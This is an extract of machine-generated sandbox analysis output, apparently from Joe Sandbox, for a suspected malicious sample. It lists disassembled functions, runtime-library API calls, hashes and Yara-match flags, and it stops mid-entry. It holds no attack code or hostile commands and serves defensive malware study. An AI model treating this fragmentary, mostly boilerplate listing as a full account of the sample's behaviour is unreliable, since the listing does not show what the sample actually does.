Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D

Function 0041350C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525

Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4

GetLastError.KERNEL32 ref: 00413541
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
__CxxThrowException@8.LIBVCRUNTIME ref: 00413565

Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC

Function 0254D074 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0254D088
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0254D0AC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0254D0BF
__CxxThrowException@8.LIBVCRUNTIME ref: 0254D0CD

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: e526f9523f766d1df8742ad646912422809b1d63eec6c338aa5e905673e0d052
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: C7F05931A0120463C724FA54D841D7EF77ABED0B2C360856AD80913281EF36F90ACA69

Function 02535A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02535A83
__Cnd_signal.LIBCPMT ref: 02535A8F
std::_Cnd_initX.LIBCPMT ref: 02535AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02535AAB

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 2eb5ea0887d934dc2f2314fc5ee0d7d54a6aaa6dbfb8278c9b92b4438aec459d
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 18F0EC71400703AFEB237770D80575A77B2BF80729F54A41DD0859A8A0DF76E8145F5D

Function 02542858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0254286F
GetLastError.KERNEL32(?,?,?,?,02548830,?,?,?,?,00000000,?,00000000), ref: 0254287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02542894
__CxxThrowException@8.LIBVCRUNTIME ref: 025428A2

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 12d1340cee55acef144fd709d8864d97f0a79f4d0845955af721bfcb81da1deb
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 1CF0A03450021ABBCF00EFA4CD44EAF7BB8BB00715F200611B910E20A0DB35D6049B68

Function 004125F1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041263B

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 0254257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02542593
GetLastError.KERNEL32(?,?,?,?,?,02540DA0), ref: 025425A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025425B7
__CxxThrowException@8.LIBVCRUNTIME ref: 025425C5

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: f11fdeb89db26bd32708b6f5888ad88a56b826db8402cb572f671905323244f2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: B9E0D87160022629E710B7748C17FBB7ADCAB40B45F440851BD14E61C1FE98D50049AC

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 02549530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542959: TlsAlloc.KERNEL32(?,02540DA0), ref: 0254295F

TlsAlloc.KERNEL32(?,02540DA0), ref: 02553BE6
GetLastError.KERNEL32 ref: 02553BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02553C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02553C1C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: fc2dd2b0ae791377084e2c639a0e9ebc53b2945c3ca9784b1b7d65a33bcef3ad
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 8FE061344006237FC300BB75DC5967E76647A00355B100E67FC29D2190EF34E0854E5C

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02542794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,02540DA0,?,?,?,00000000), ref: 0254279E
GetLastError.KERNEL32(?,?,?,00000000), ref: 025427AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025427C3
__CxxThrowException@8.LIBVCRUNTIME ref: 025427D1

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: c0bfeec0d110ff3f2feb7aae833817dbd6a0f57fdbe2e5d2c5cd6e676760c359
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: D6E0867460011AA7CB00FBB5DD49EAFB7BC7A40B09F600566B901E3150EF68D7088B7D

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B39,?,?,?,00000000), ref: 00412537
GetLastError.KERNEL32(?,?,?,00000000), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 025428EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 025428F8
GetLastError.KERNEL32 ref: 02542904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0254291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02542928

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: b9e49093b9312e39f2a9c901ae2a295b47abce11b8c4702eadb5c4038b13bff6
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 31E0863450012A67DB14BF71CC09BBB7B6CBB00749F500925BC15D20A1EF39D1548A9C

Function 025429B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02547BD8,00000000,?,?,02540DA0,?,?,?,00000000,?,00000000), ref: 025429BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 025429CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025429E0
__CxxThrowException@8.LIBVCRUNTIME ref: 025429EE

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 659436000714c62bf6144a14295735c4ba3faed3922303ff8856b788435a4f19
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: CDE04F3410012A6ADB10AF61CC08BBA7A68BF00749F500926BD19E10A0EF39D1549AAC

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 02542959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02540DA0), ref: 0254295F
GetLastError.KERNEL32 ref: 0254296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02542982
__CxxThrowException@8.LIBVCRUNTIME ref: 02542990

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 912341c4044dab6969b36a1185c73ae8f322becfb665e75f70ce21555016b54c
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: BFE0CD30000126578714B7749C4CA7BB6687B41719F500F16F861E20E0EF68D044455C

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 025420FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 02542103

Part of subcall function 02541379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0254139A
Part of subcall function 02541379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 025413D1
Part of subcall function 02541379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 025413DD

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0254210F

Part of subcall function 02540CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02540D0E

Concurrency::Context::Block.LIBCONCRT ref: 02542114

Part of subcall function 02542EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02542ECA

Concurrency::critical_section::lock.LIBCONCRT ref: 02542134

Part of subcall function 025412A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 025412B0
Part of subcall function 025412A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 025412BD
Part of subcall function 025412A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 025412C8

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: d2d6300b8e7e708b56196a7a94333436f9b9703776def310390fff59781c07d8
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: 8BE04F35A00517ABCB09FB61C5605ACFB62BFC5358B648355D869872E0CF346E46CF98

Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C

Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8

Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7

Concurrency::Context::Block.LIBCONCRT ref: 00411EAD

Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63

Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD

Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0256B0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0256B32B,?,00000050,?,?,?,?,?), ref: 0256B1AB

Strings

OCP, xrefs: 0256B124
ACP, xrefs: 0256B0EE

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
